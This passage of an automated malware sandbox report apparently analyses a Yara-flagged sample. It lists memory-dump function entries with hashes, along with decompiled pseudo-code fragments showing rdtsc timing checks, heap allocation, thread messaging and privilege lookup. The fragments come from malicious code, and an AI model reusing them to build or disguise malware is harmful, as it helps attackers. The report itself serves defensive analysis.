                                                                                                                                                    • Associated: 00000007.00000002.2246731757.0000000000A00000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246739338.0000000000A04000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246746087.0000000000A07000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246752065.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246784838.0000000000A70000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                                                                                                                    • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                                                                                                                                    • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                                                                                                                    • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0091FC90, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246637446.0000000000910000.00000040.00000001.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                    • Associated: 00000007.00000002.2246630642.0000000000900000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246724865.00000000009F0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246731757.0000000000A00000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246739338.0000000000A04000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246746087.0000000000A07000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246752065.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246784838.0000000000A70000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    • Opcode ID: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                                                                                                                                    • Instruction ID: 41c45e5f09b42d6e0ddb2dc3248e04f5cc5ab51982cd1fe1d329002f24c15819
                                                                                                                                                    • Opcode Fuzzy Hash: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                                                                                                                                    • Instruction Fuzzy Hash: 14B01272104580C7E349AB14D90AB5BB210FB90F00F40893AE04B81850DA3C992CC546
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0091FC60, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246637446.0000000000910000.00000040.00000001.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                    • Associated: 00000007.00000002.2246630642.0000000000900000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246724865.00000000009F0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246731757.0000000000A00000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246739338.0000000000A04000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246746087.0000000000A07000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246752065.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246784838.0000000000A70000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                                                                                                                    • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                                                                                                                                    • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                                                                                                                    • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0091FD8C, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246637446.0000000000910000.00000040.00000001.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                    • Associated: 00000007.00000002.2246630642.0000000000900000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246724865.00000000009F0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246731757.0000000000A00000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246739338.0000000000A04000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246746087.0000000000A07000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246752065.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246784838.0000000000A70000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                                                                                                                    • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                                                                                                                                                    • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                                                                                                                    • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0091FDC0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246637446.0000000000910000.00000040.00000001.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                    • Associated: 00000007.00000002.2246630642.0000000000900000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246724865.00000000009F0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246731757.0000000000A00000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246739338.0000000000A04000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246746087.0000000000A07000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246752065.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246784838.0000000000A70000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                                                                                                                    • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                                                                                                                                    • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                                                                                                                    • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0091FEA0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246637446.0000000000910000.00000040.00000001.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                    • Associated: 00000007.00000002.2246630642.0000000000900000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246724865.00000000009F0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246731757.0000000000A00000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246739338.0000000000A04000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246746087.0000000000A07000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246752065.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246784838.0000000000A70000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    • Opcode ID: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                                                                                                                                    • Instruction ID: c5322eb374cbfb3adeb08d178b54e1ae74a7d58a0408861c097d1ba4bd942992
                                                                                                                                                    • Opcode Fuzzy Hash: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                                                                                                                                    • Instruction Fuzzy Hash: 0DB01272200640C7F31A9714D906F4B7210FB80F00F00893AA007C19A1DB389A2CD556
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0091FED0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246637446.0000000000910000.00000040.00000001.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                    • Associated: 00000007.00000002.2246630642.0000000000900000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246724865.00000000009F0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246731757.0000000000A00000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246739338.0000000000A04000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246746087.0000000000A07000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246752065.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246784838.0000000000A70000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                                                                                                                    • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                                                                                                                                    • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                                                                                                                    • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0091FFB4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246637446.0000000000910000.00000040.00000001.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                    • Associated: 00000007.00000002.2246630642.0000000000900000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246724865.00000000009F0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246731757.0000000000A00000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246739338.0000000000A04000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246746087.0000000000A07000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246752065.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246784838.0000000000A70000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                                                                                                                    • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                                                                                                                                    • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                                                                                                                    • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 009207AC, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246637446.0000000000910000.00000040.00000001.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                    • Associated: 00000007.00000002.2246630642.0000000000900000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246724865.00000000009F0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246731757.0000000000A00000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246739338.0000000000A04000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246746087.0000000000A07000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246752065.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246784838.0000000000A70000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    • Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                                                                                                                    • Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
                                                                                                                                                    • Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                                                                                                                    • Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004088C0, Relevance: .1, Instructions: 92COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 93%
                                                                                                                                                    			E004088C0(intOrPtr _a4) {
				intOrPtr _v8;
				char _v24;
				char _v284;
				char _v804;
				char _v840;
				void* _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t39;
				void* _t50;
				intOrPtr _t52;
				void* _t53;
				void* _t54;
				void* _t55;
				void* _t56;

				_t52 = _a4;
				_t39 = 0; // executed
				_t24 = E00406E10(_t52,  &_v24); // executed
				_t54 = _t53 + 8;
				if(_t24 != 0) {
					E00407020( &_v24,  &_v840);
					_t55 = _t54 + 8;
					do {
						E00419CE0( &_v284, 0x104);
						E0041A350( &_v284,  &_v804);
						_t56 = _t55 + 0x10;
						_t50 = 0x4f;
						while(1) {
							_t31 = E00413DE0(E00413D80(_t52, _t50),  &_v284);
							_t56 = _t56 + 0x10;
							if(_t31 != 0) {
								break;
							}
							_t50 = _t50 + 1;
							if(_t50 <= 0x62) {
								continue;
							} else {
							}
							goto L8;
						}
						_t9 = _t52 + 0x14; // 0xffffe1a5
						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
						_t39 = 1;
						L8:
						_t33 = E00407050( &_v24,  &_v840);
						_t55 = _t56 + 8;
					} while (_t33 != 0 && _t39 == 0);
					_t34 = E004070D0(_t52,  &_v24); // executed
					if(_t39 == 0) {
						asm("rdtsc");
						asm("rdtsc");
						_v8 = _t34 - 0 + _t34;
						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
					}
					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
					_t20 = _t52 + 0x31; // 0x5608758b
					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
					return 1;
				} else {
					return _t24;
				}
			}



















                                                                                                                                                    0x004088cb
                                                                                                                                                    0x004088d3
                                                                                                                                                    0x004088d5
                                                                                                                                                    0x004088da
                                                                                                                                                    0x004088df
                                                                                                                                                    0x004088f2
                                                                                                                                                    0x004088f7
                                                                                                                                                    0x00408900
                                                                                                                                                    0x0040890c
                                                                                                                                                    0x0040891f
                                                                                                                                                    0x00408924
                                                                                                                                                    0x00408927
                                                                                                                                                    0x00408930
                                                                                                                                                    0x00408942
                                                                                                                                                    0x00408947
                                                                                                                                                    0x0040894c
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040894e
                                                                                                                                                    0x00408952
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00408954
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00408952
                                                                                                                                                    0x00408956
                                                                                                                                                    0x00408959
                                                                                                                                                    0x0040895f
                                                                                                                                                    0x00408961
                                                                                                                                                    0x0040896c
                                                                                                                                                    0x00408971
                                                                                                                                                    0x00408974
                                                                                                                                                    0x00408981
                                                                                                                                                    0x0040898c
                                                                                                                                                    0x0040898e
                                                                                                                                                    0x00408994
                                                                                                                                                    0x00408998
                                                                                                                                                    0x0040899b
                                                                                                                                                    0x0040899b
                                                                                                                                                    0x004089a2
                                                                                                                                                    0x004089a5
                                                                                                                                                    0x004089aa
                                                                                                                                                    0x004089b7
                                                                                                                                                    0x004088e6
                                                                                                                                                    0x004088e6
                                                                                                                                                    0x004088e6

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246257528.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 67bb4e2207c22d687f6acc024d55c7e0c161e5d4599185de851a30ee67947c6b
                                                                                                                                                    • Instruction ID: 4c2b1df36aa7b29bb0fae7ecfb93cd688d28708cc461f9fe29ca3c1f3973371e
                                                                                                                                                    • Opcode Fuzzy Hash: 67bb4e2207c22d687f6acc024d55c7e0c161e5d4599185de851a30ee67947c6b
                                                                                                                                                    • Instruction Fuzzy Hash: EC213CB2D442085BCB10E6649D42BFF73AC9B50304F04057FF989A3181FA38BB498BA7
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00418466, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 37%
                                                                                                                                                    			E00418466(signed int __ebx, void* _a4) {
				void* _v0;
				void* _v4;
				signed int _t13;

				asm("fsubrp st3, st0");
				_push(0x74);
				_t13 = __ebx * 0x74;
				if (_t13 <= 0) goto L3;
			}






                                                                                                                                                    0x0041846a
                                                                                                                                                    0x0041846c
                                                                                                                                                    0x0041846d
                                                                                                                                                    0x0041846f

                                                                                                                                                    APIs
                                                                                                                                                    • RtlAllocateHeap.NTDLL(&5A,?,00413C9F,00413C9F,?,00413526,?,?,?,?,?,00000000,00408B03,?), ref: 004184CD
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246257528.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                                    • String ID: &5A
                                                                                                                                                    • API String ID: 1279760036-1617645808
                                                                                                                                                    • Opcode ID: e5ff93ddb35fed0d7f286053971ed91a1ee32018779d89d2803b508e57d8f9db
                                                                                                                                                    • Instruction ID: 9207933e5bff9b50245d89a6aef777533999b706f6573a0da11b195f706207f6
                                                                                                                                                    • Opcode Fuzzy Hash: e5ff93ddb35fed0d7f286053971ed91a1ee32018779d89d2803b508e57d8f9db
                                                                                                                                                    • Instruction Fuzzy Hash: 5FF0A7B26002146BD724EF94DC81EE7736DEFC4390F10855EF94C5B241DA31E90587E0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004184A0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 37%
                                                                                                                                                    			E004184A0(intOrPtr _a4, char _a8, intOrPtr _a12, void* _a16) {
				intOrPtr _t9;
				void* _t10;
				void* _t12;

				E00418DD0(_a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t9 = _a12;
				_t6 =  &_a8; // 0x413526
				_t12 =  *_t6;
				asm("les edx, [edx+edx*2]");
				_push(_t9);
				_t10 = RtlAllocateHeap(_t12); // executed
				return _t10;
			}






                                                                                                                                                    0x004184b7
                                                                                                                                                    0x004184bf
                                                                                                                                                    0x004184c2
                                                                                                                                                    0x004184c2
                                                                                                                                                    0x004184c6
                                                                                                                                                    0x004184cb
                                                                                                                                                    0x004184cd
                                                                                                                                                    0x004184d1

                                                                                                                                                    APIs
                                                                                                                                                    • RtlAllocateHeap.NTDLL(&5A,?,00413C9F,00413C9F,?,00413526,?,?,?,?,?,00000000,00408B03,?), ref: 004184CD
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246257528.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                                    • String ID: &5A
                                                                                                                                                    • API String ID: 1279760036-1617645808
                                                                                                                                                    • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                                                                                    • Instruction ID: 6eed1dfa6fdd4b996c8079955bb5808ea645f65af4e2973490dba1d49a230398
                                                                                                                                                    • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                                                                                    • Instruction Fuzzy Hash: 94E012B1200208ABDB14EF99DC41EA777ACAF88654F118559BA085B282CA30F9108AB0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00407270, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 82%
                                                                                                                                                    			E00407270(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				intOrPtr* _t25;
				void* _t26;
				void* _t30;

				_t30 = __eflags;
				_v68 = 0;
				E00419D30( &_v67, 0, 0x3f);
				E0041A910( &_v68, 3);
				_t12 = E00409B30(_t30, _a4 + 0x1c,  &_v68); // executed
				_t13 = E00413E40(_t12, _a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t32 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t25(_t21, 0x8003, _t26 + (E00409290(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}












                                                                                                                                                    0x00407270
                                                                                                                                                    0x0040727f
                                                                                                                                                    0x00407283
                                                                                                                                                    0x0040728e
                                                                                                                                                    0x0040729e
                                                                                                                                                    0x004072ae
                                                                                                                                                    0x004072b3
                                                                                                                                                    0x004072ba
                                                                                                                                                    0x004072bd
                                                                                                                                                    0x004072ca
                                                                                                                                                    0x004072cc
                                                                                                                                                    0x004072ce
                                                                                                                                                    0x004072eb
                                                                                                                                                    0x004072eb
                                                                                                                                                    0x00000000
                                                                                                                                                    0x004072ed
                                                                                                                                                    0x004072f2

                                                                                                                                                    APIs
                                                                                                                                                    • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072CA
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246257528.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessagePostThread
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1836367815-0
                                                                                                                                                    • Opcode ID: b429a28fbdaf8ade12dc58879e230a39c476b9a6de75f7f862eb8cc2ee54f132
                                                                                                                                                    • Instruction ID: 34c16447600cfe3bfc53875ba7b31b7f06d917fb68e10caa6e1b72df1d8a1719
                                                                                                                                                    • Opcode Fuzzy Hash: b429a28fbdaf8ade12dc58879e230a39c476b9a6de75f7f862eb8cc2ee54f132
                                                                                                                                                    • Instruction Fuzzy Hash: 9901D431A8022877E720A6959C03FFE776C5B00B55F05046EFF04BA1C2E6A87A0542EA
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004186B1, Relevance: 1.5, APIs: 1, Instructions: 40COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFB2,0040CFB2,00000041,00000000,?,00408B75), ref: 00418670
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246257528.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: LookupPrivilegeValue
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3899507212-0
                                                                                                                                                    • Opcode ID: a383c19f0c3e3c2feb5d59b8ee80593fa1d9c14dacdb5dde747d696b7fc5ead1
                                                                                                                                                    • Instruction ID: ff36e9b11114d1afdb3a3bd1ceb29c80d8feb899446d4ed73710a8a8776a217a
                                                                                                                                                    • Opcode Fuzzy Hash: a383c19f0c3e3c2feb5d59b8ee80593fa1d9c14dacdb5dde747d696b7fc5ead1
                                                                                                                                                    • Instruction Fuzzy Hash: 96F0C275201204AFDB10DF69DC81CE777A8EF88354B01864EF84C97253D635E915CBA0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00418631, Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFB2,0040CFB2,00000041,00000000,?,00408B75), ref: 00418670
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246257528.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: LookupPrivilegeValue
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3899507212-0
                                                                                                                                                    • Opcode ID: 1007595e98b949c926a59409bf861663300e264e347bdfd6eb6e884888ba52a4
                                                                                                                                                    • Instruction ID: 42882972ca30b6fac69cf671eea72bd8fc0ce937952c153f9563551603e41dd5
                                                                                                                                                    • Opcode Fuzzy Hash: 1007595e98b949c926a59409bf861663300e264e347bdfd6eb6e884888ba52a4
                                                                                                                                                    • Instruction Fuzzy Hash: FFF0E5B52002146FDB10DF54DC80FEB37A9EF89350F018055FE485F281D935E8018BB4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004184DF, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
